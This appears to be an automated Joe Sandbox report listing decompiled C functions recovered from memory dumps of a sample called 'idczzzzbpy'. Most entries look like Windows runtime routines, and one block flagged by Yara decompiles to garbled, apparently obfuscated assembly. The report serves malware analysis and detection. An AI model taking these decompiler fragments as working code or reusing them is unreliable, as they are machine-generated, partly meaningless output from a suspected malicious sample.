                    • Instruction ID: d18f15b19ffe6dd5db9e3d5a50a59c3fad18f70ec9395383908536666cbe109b
                    • Opcode Fuzzy Hash: 0df088ac16afc3c0e3e841d4a6adecbbbfc3086c4859811a3e4e51b0af53980d
                    • Instruction Fuzzy Hash: 85F06271A00258EFDB24EFE8D905A6EB7F4FF14300F4440A9E915EB381EA349900CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0168C577(void* __ecx, char _a4) {
                    				void* __esi;
                    				void* __ebp;
                    				void* _t17;
                    				void* _t19;
                    				void* _t20;
                    				void* _t21;
                    
                    				_t18 = __ecx;
                    				_t21 = __ecx;
                    				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0168C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                    					__eflags = _a4;
                    					if(__eflags != 0) {
                    						L10:
                    						E017388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                    						L9:
                    						return 0;
                    					}
                    					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                    					if(__eflags == 0) {
                    						goto L10;
                    					}
                    					goto L9;
                    				} else {
                    					return 1;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f4de1b2b23f43fd88b87e42e46efda0806729c65aa8ffcb8c0b30d42a5db26d9
                    • Instruction ID: b7f188150bf6c66bd64792a0d4dd6308cf1cd9a3da146316eb50b552e7dcc424
                    • Opcode Fuzzy Hash: f4de1b2b23f43fd88b87e42e46efda0806729c65aa8ffcb8c0b30d42a5db26d9
                    • Instruction Fuzzy Hash: C5F090B29166909FEF36A71C8804BA27FD49B05670F448666E50587702C7A4D8A0C273
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E01722073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                    				void* __esi;
                    				signed char _t3;
                    				signed char _t7;
                    				void* _t19;
                    
                    				_t17 = __ecx;
                    				_t3 = E0171FD22(__ecx);
                    				_t19 =  *0x175849c - _t3; // 0x6c523392
                    				if(_t19 == 0) {
                    					__eflags = _t17 -  *0x1758748; // 0x0
                    					if(__eflags <= 0) {
                    						E01721C06();
                    						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                    						__eflags = _t3;
                    						if(_t3 != 0) {
                    							L5:
                    							__eflags =  *0x1758724 & 0x00000004;
                    							if(( *0x1758724 & 0x00000004) == 0) {
                    								asm("int3");
                    								return _t3;
                    							}
                    						} else {
                    							_t3 =  *0x7ffe02d4 & 0x00000003;
                    							__eflags = _t3 - 3;
                    							if(_t3 == 3) {
                    								goto L5;
                    							}
                    						}
                    					}
                    					return _t3;
                    				} else {
                    					_t7 =  *0x1758724; // 0x0
                    					return E01718DF1(__ebx, 0xc0000374, 0x1755890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf1910726637ca8b56b02073b600b20adde14bfeb1c7f5aee75f413350a68117
                    • Instruction ID: d3bafc91e7a75f1dc6830184e6539a8478ebebf5d05c412627758bd77c9d07ec
                    • Opcode Fuzzy Hash: cf1910726637ca8b56b02073b600b20adde14bfeb1c7f5aee75f413350a68117
                    • Instruction Fuzzy Hash: 23F0202A8152A54BDF326B2D20053E1EF92D755120B494885D8901B20EC5B9C883CB22
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E016A927A(void* __ecx) {
                    				signed int _t11;
                    				void* _t14;
                    
                    				_t11 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                    				if(_t11 != 0) {
                    					E016AFA60(_t11, 0, 0x98);
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                    					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                    					E016A92C6(_t11, _t14);
                    				}
                    				return _t11;
                    			}






                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                    • Instruction ID: 5e10714edf665f823fcc32ae8a2734f72222a6c1a017659a7ef0c396f8425e9f
                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                    • Instruction Fuzzy Hash: 10E02B323405016BE7119E09CC80F47375EDF92724F00407CB9001E242CAE5DC088BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 43%
                    			E01738D34(intOrPtr __ecx, intOrPtr __edx) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				short _v42;
                    				char _v48;
                    				signed char* _t12;
                    				intOrPtr _t18;
                    				intOrPtr _t24;
                    				intOrPtr _t25;
                    				signed int _t26;
                    
                    				_t23 = __edx;
                    				_v8 =  *0x175d360 ^ _t26;
                    				_v16 = __ecx;
                    				_v42 = 0x1c2b;
                    				_v12 = __edx;
                    				if(E01687D50() == 0) {
                    					_t12 = 0x7ffe0386;
                    				} else {
                    					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    				}
                    				_push( &_v48);
                    				_push(8);
                    				_push(0x20402);
                    				_push( *_t12 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                    			}














                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29ce7400e7c19c123df884024dcb0c2e633575fd5caa98a095f9eb8bf6e09907
                    • Instruction ID: a70f1c559b080a59b58d0756e457371823933d648cf15f7e83a65abcdcadc5c4
                    • Opcode Fuzzy Hash: 29ce7400e7c19c123df884024dcb0c2e633575fd5caa98a095f9eb8bf6e09907
                    • Instruction Fuzzy Hash: F9F0BE70A04608AFDB14EFB8D945A6EB7B4EF58300F508099F905EB281EA34D900CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 36%
                    			E01738B58(intOrPtr __ecx) {
                    				signed int _v8;
                    				intOrPtr _v20;
                    				short _v46;
                    				char _v52;
                    				signed char* _t11;
                    				intOrPtr _t17;
                    				intOrPtr _t22;
                    				intOrPtr _t23;
                    				intOrPtr _t24;
                    				signed int _t25;
                    
                    				_v8 =  *0x175d360 ^ _t25;
                    				_v20 = __ecx;
                    				_v46 = 0x1c26;
                    				if(E01687D50() == 0) {
                    					_t11 = 0x7ffe0386;
                    				} else {
                    					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    				}
                    				_push( &_v52);
                    				_push(4);
                    				_push(0x402);
                    				_push( *_t11 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                    			}














                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a7eb0293a8eb79d5921bc4d7d4085e09e8c874530762b87156fce3bb6eea62b4
                    • Instruction ID: 5e4f434de4d3ba5431e9e9e9338853c3b702bf4edeedcd3c4a93b067d676e8b5
                    • Opcode Fuzzy Hash: a7eb0293a8eb79d5921bc4d7d4085e09e8c874530762b87156fce3bb6eea62b4
                    • Instruction Fuzzy Hash: 13F0E2B0A00259ABDB14EBA8D906E6EB3B4EF04300F50019DBA01DB381EA30D900C798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0168746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                    				signed int _t8;
                    				void* _t10;
                    				short* _t17;
                    				void* _t19;
                    				intOrPtr _t20;
                    				void* _t21;
                    
                    				_t20 = __esi;
                    				_t19 = __edi;
                    				_t17 = __ebx;
                    				if( *((char*)(_t21 - 0x25)) != 0) {
                    					if(__ecx == 0) {
                    						E0167EB70(__ecx, 0x17579a0);
                    					} else {
                    						asm("lock xadd [ecx], eax");
                    						if((_t8 | 0xffffffff) == 0) {
                    							_push( *((intOrPtr*)(__ecx + 4)));
                    							E016A95D0();
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                    							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                    							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                    						}
                    					}
                    					L10:
                    				}
                    				_t10 = _t19 + _t19;
                    				if(_t20 >= _t10) {
                    					if(_t19 != 0) {
                    						 *_t17 = 0;
                    						return 0;
                    					}
                    				}
                    				return _t10;
                    				goto L10;
                    			}










                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 715ba7b31afeee5a124b4cf10420d3a4cef14d0a16a6511026907f935edfac90
                    • Instruction ID: b4fd398fb3280c83acb87f37babc7b6162c6c5f7b1c875c17b80784c688961c7
                    • Opcode Fuzzy Hash: 715ba7b31afeee5a124b4cf10420d3a4cef14d0a16a6511026907f935edfac90
                    • Instruction Fuzzy Hash: E2F0E934502149AADF02B76CCC40B79BFB2AF04794F644359D895A7251E7659801C799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 36%
                    			E01738CD6(intOrPtr __ecx) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				short _v38;
                    				char _v44;
                    				signed char* _t11;
                    				intOrPtr _t17;
                    				intOrPtr _t22;
                    				intOrPtr _t23;
                    				intOrPtr _t24;
                    				signed int _t25;
                    
                    				_v8 =  *0x175d360 ^ _t25;
                    				_v12 = __ecx;
                    				_v38 = 0x1c2d;
                    				if(E01687D50() == 0) {
                    					_t11 = 0x7ffe0386;
                    				} else {
                    					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    				}
                    				_push( &_v44);
                    				_push(0xffffffe4);
                    				_push(0x402);
                    				_push( *_t11 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                    			}














                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f0823d54639c4889563bc6c3503a64aae19a5f0bcb4e8d39ef66b2b9a8ab12a
                    • Instruction ID: 1e643197c0a9aaafd91494e5cebdacb20247870d6ede57860a24dcdf362c48b1
                    • Opcode Fuzzy Hash: 3f0823d54639c4889563bc6c3503a64aae19a5f0bcb4e8d39ef66b2b9a8ab12a
                    • Instruction Fuzzy Hash: 09F0E270A04209ABCB00EBB8E945E6EB7B4EF58300F600299F911EB281EA34DD00CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E01664F2E(void* __ecx, char _a4) {
                    				void* __esi;
                    				void* __ebp;
                    				void* _t17;
                    				void* _t19;
                    				void* _t20;
                    				void* _t21;
                    
                    				_t18 = __ecx;
                    				_t21 = __ecx;
                    				if(__ecx == 0) {
                    					L6:
                    					__eflags = _a4;
                    					if(__eflags != 0) {
                    						L8:
                    						E017388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                    						L9:
                    						return 0;
                    					}
                    					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                    					if(__eflags != 0) {
                    						goto L9;
                    					}
                    					goto L8;
                    				}
                    				_t18 = __ecx + 0x30;
                    				if(E0168C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1641030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                    					goto L6;
                    				} else {
                    					return 1;
                    				}
                    			}










                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcd9dc732d0662b06c9354b58b44e63b2c39ac40ac2146f61c52663c61fa1b50
                    • Instruction ID: dafeb0fb50d98abfb68e1aff5036a0ea75d44ab37f9d3f7879622f8d6a9f718d
                    • Opcode Fuzzy Hash: bcd9dc732d0662b06c9354b58b44e63b2c39ac40ac2146f61c52663c61fa1b50
                    • Instruction Fuzzy Hash: ECF0B439526695CFD761DB1CCA44B32B7E4EB10A78F044669E40587A12C735E840C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0169A44B(signed int __ecx) {
                    				intOrPtr _t13;
                    				signed int _t15;
                    				signed int* _t16;
                    				signed int* _t17;
                    
                    				_t13 =  *0x1757b9c; // 0x0
                    				_t15 = __ecx;
                    				_t16 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                    				if(_t16 == 0) {
                    					return 0;
                    				}
                    				 *_t16 = _t15;
                    				_t17 =  &(_t16[2]);
                    				E016AFA60(_t17, 0, _t15 << 2);
                    				return _t17;
                    			}








                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4226fa98476b062f054e407d745b4279113efe0ccc137e0d0ae07e6ca3276b1d
                    • Instruction ID: 617cd88489708318e358518451e58c16823f6e2ed3023e269483f213b0641420
                    • Opcode Fuzzy Hash: 4226fa98476b062f054e407d745b4279113efe0ccc137e0d0ae07e6ca3276b1d
                    • Instruction Fuzzy Hash: 12E09272A02422ABD3215A58AD00F66739EDBE4A51F0A4039FA04C7214DA68DD02C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E0166F358(void* __ecx, signed int __edx) {
                    				char _v8;
                    				signed int _t9;
                    				void* _t20;
                    
                    				_push(__ecx);
                    				_t9 = 2;
                    				_t20 = 0;
                    				if(E0169F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                    					_t20 = L01684620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                    				}
                    				return _t20;
                    			}







                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                    • Instruction ID: a62868efe0002fd7564b8bb8dfe43185166108bcf75a89c7671668c68e6eac8d
                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                    • Instruction Fuzzy Hash: 93E0D832A40228FBDB21A6D99D05F5ABFADDB58A60F0101D5FA04E7150D9649D40C2D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 19%
                    			E00417DA4(void* __eax, void* __ebx, void* __ecx, void* __edx) {
                    				void* _t21;
                    				intOrPtr* _t27;
                    				char _t33;
                    				signed int _t40;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					asm("sti");
                    					_t27 = __ecx - 1;
                    					asm("fst dword [esi+0xc]");
                    					asm("movsb");
                    					asm("aad 0xf1");
                    					_t1 = __ebx + 0x27a52988;
                    					 *_t1 =  *(__ebx + 0x27a52988) & _t40;
                    					if( *_t1 < 0) {
                    						break;
                    					}
                    					L1:
                    					asm("stosd");
                    					asm("salc");
                    					asm("stc");
                    					asm("aam 0x89");
                    					asm("iretd");
                    					L2:
                    					asm("aad 0xd4");
                    					asm("adc al, bl");
                    					 *_t27 =  *_t27 - 0x68fd1b61;
                    					asm("clc");
                    					asm("int3");
                    					asm("int3");
                    					asm("cdq");
                    					asm("loop 0xfffffffd");
                    					asm("lds eax, [edi]");
                    					_push(ss);
                    					asm("popad");
                    					asm("outsb");
                    					 *((char*)(_t33 + 0xd1fa36ce)) = _t33;
                    					asm("sbb [gs:esi], esp");
                    					 *0x68fd1b61 =  *0x68fd1b61 - 0x68fd1b61;
                    					asm("sbb ecx, edi");
                    					asm("repne push cs");
                    					 *0x5e114725 = 0x5e114725;
                    					asm("adc bh, bh");
                    					_pop(_t21);
                    					asm("iretd");
                    				}
                    				L3:
                    				asm("outsd");
                    				asm("scasb");
                    				asm("in eax, 0x36");
                    				return _t21 + 0xd2;
                    			}








                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f71478b1dd33e8165daf0ad5d2e976e4829bb72d9db0870c569fa6390cefc58
                    • Instruction ID: d846c9b1527ffd6f024c9161636dcd27b1cf8746da594e133844b580c99a1eba
                    • Opcode Fuzzy Hash: 9f71478b1dd33e8165daf0ad5d2e976e4829bb72d9db0870c569fa6390cefc58
                    • Instruction Fuzzy Hash: F1D0A7B3D89905974B105CA4F9D00F4F330E966333B20529BED09E33048641C11256CA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0167FF60(intOrPtr _a4) {
                    				void* __ecx;
                    				void* __ebp;
                    				void* _t13;
                    				intOrPtr _t14;
                    				void* _t15;
                    				void* _t16;
                    				void* _t17;
                    
                    				_t14 = _a4;
                    				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x16411a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                    					return E017388F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                    				} else {
                    					return E01680050(_t14);
                    				}
                    			}











                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6a9bb1b8acd8f1139fa07ac3849fc54631f2108d89aa41d88d418f391b7f19f
                    • Instruction ID: e5582b6f88387eff5238d318d888a9a98c59feb923b8a2b526c06beda73a3681
                    • Opcode Fuzzy Hash: f6a9bb1b8acd8f1139fa07ac3849fc54631f2108d89aa41d88d418f391b7f19f
                    • Instruction Fuzzy Hash: 6FE0DFB020A204DFD735EF5DE840F257B9C9B52621F19859DF0188B602CF29E881C28A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E016F41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				void* _t5;
                    				void* _t14;
                    
                    				_push(8);
                    				_push(0x17408f0);
                    				_t5 = E016BD08C(__ebx, __edi, __esi);
                    				if( *0x17587ec == 0) {
                    					E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                    					if( *0x17587ec == 0) {
                    						 *0x17587f0 = 0x17587ec;
                    						 *0x17587ec = 0x17587ec;
                    						 *0x17587e8 = 0x17587e4;
                    						 *0x17587e4 = 0x17587e4;
                    					}
                    					 *(_t14 - 4) = 0xfffffffe;
                    					_t5 = L016F4248();
                    				}
                    				return E016BD0D1(_t5);
                    			}






                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5bb13f7509f8e5abdd9ef7e1bc34253035e27d1fc4897c69570e49e50473171
                    • Instruction ID: 3dd9f9aee4d3bcc417c92587f176c4e49ed2e707988d693cb9570f36704562fe
                    • Opcode Fuzzy Hash: f5bb13f7509f8e5abdd9ef7e1bc34253035e27d1fc4897c69570e49e50473171
                    • Instruction Fuzzy Hash: B8F01E78860701CFDBB0EFFAA90075876A5F754364F00C96F92008B699CBB844A5CF0A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0171D380(void* __ecx, void* __edx, intOrPtr _a4) {
                    				void* _t5;
                    
                    				if(_a4 != 0) {
                    					_t5 = L0166E8B0(__ecx, _a4, 0xfff);
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                    					return _t5;
                    				}
                    				return 0xc000000d;
                    			}





                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                    • Instruction ID: 565da9bb331c706b402526d0da0417bd4083a3cf8e6af492b438ad1bc504408d
                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                    • Instruction Fuzzy Hash: A3E0C231280205FBDB326E88CC00F79BB1BDB507A0F204035FE085A690C6759D91DAC8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aa4a6c7ea1e483c1f1cb4b69740e5dafc6ab197a628218eb044f99d80a06dbe8
                    • Instruction ID: a8d361c421d06a657629f9e6e5efec2431b215eceeb8d47b9924a6ae19247642
                    • Opcode Fuzzy Hash: aa4a6c7ea1e483c1f1cb4b69740e5dafc6ab197a628218eb044f99d80a06dbe8
                    • Instruction Fuzzy Hash: 04C08CA2A6281A47F529080CAD413F5E398D70A271E0427ABEC08678000087C09301EC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0169A185() {
                    				void* __ecx;
                    				intOrPtr* _t5;
                    
                    				if( *0x17567e4 >= 0xa) {
                    					if(_t5 < 0x1756800 || _t5 >= 0x1756900) {
                    						return L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                    					} else {
                    						goto L1;
                    					}
                    				} else {
                    					L1:
                    					return E01680010(0x17567e0, _t5);
                    				}
                    			}






                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1b4e79d4cf91b3347725721ac0d3e0f9e5e5ee5fa3ed663e7235760990cd1023
                    • Instruction ID: e6d083d2e2e690469197b7465676161530989d1cf21e49328b324350c3d01964
                    • Opcode Fuzzy Hash: 1b4e79d4cf91b3347725721ac0d3e0f9e5e5ee5fa3ed663e7235760990cd1023
                    • Instruction Fuzzy Hash: DED0C7A11640001BCB2D33A09D14B2136ABF780671F744A2CF2060BAA4EAF08CD8C208
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E016916E0(void* __edx, void* __eflags) {
                    				void* __ecx;
                    				void* _t3;
                    
                    				_t3 = E01691710(0x17567e0);
                    				if(_t3 == 0) {
                    					_t6 =  *[fs:0x30];
                    					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                    						goto L1;
                    					} else {
                    						return L01684620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                    					}
                    				} else {
                    					L1:
                    					return _t3;
                    				}
                    			}






                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fd73972b2385087c211a6d32e90d09f6f34f5d8421e482408175f0419c32da44
                    • Instruction ID: a94656a9aff1ee6188cecf5d24c6db6f251824ae5283cc8f55243d511286191d
                    • Opcode Fuzzy Hash: fd73972b2385087c211a6d32e90d09f6f34f5d8421e482408175f0419c32da44
                    • Instruction Fuzzy Hash: C3D0A73120011393EF2D5B149C14B14365AEB917A5F38006CF217496C0DFB0CC92F08C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E016E53CA(void* __ebx) {
                    				intOrPtr _t7;
                    				void* _t13;
                    				void* _t14;
                    				intOrPtr _t15;
                    				void* _t16;
                    
                    				_t13 = __ebx;
                    				if( *((char*)(_t16 - 0x65)) != 0) {
                    					E0167EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                    					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                    				}
                    				if(_t15 != 0) {
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                    					return  *((intOrPtr*)(_t16 - 0x64));
                    				}
                    				return _t7;
                    			}









                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                    • Instruction ID: de7e1ec319098c33bcd7e60aa12612aa0ac8c990812b5cd2458256b224c95720
                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                    • Instruction Fuzzy Hash: 58E08C359007809BCF12EB48CE54F5EBBF6FB44B00F240048A0095B720C764AC00CB00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0167AAB0() {
                    				intOrPtr* _t4;
                    
                    				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                    				if(_t4 != 0) {
                    					if( *_t4 == 0) {
                    						goto L1;
                    					} else {
                    						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                    					}
                    				} else {
                    					L1:
                    					return 0x7ffe0030;
                    				}
                    			}





                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
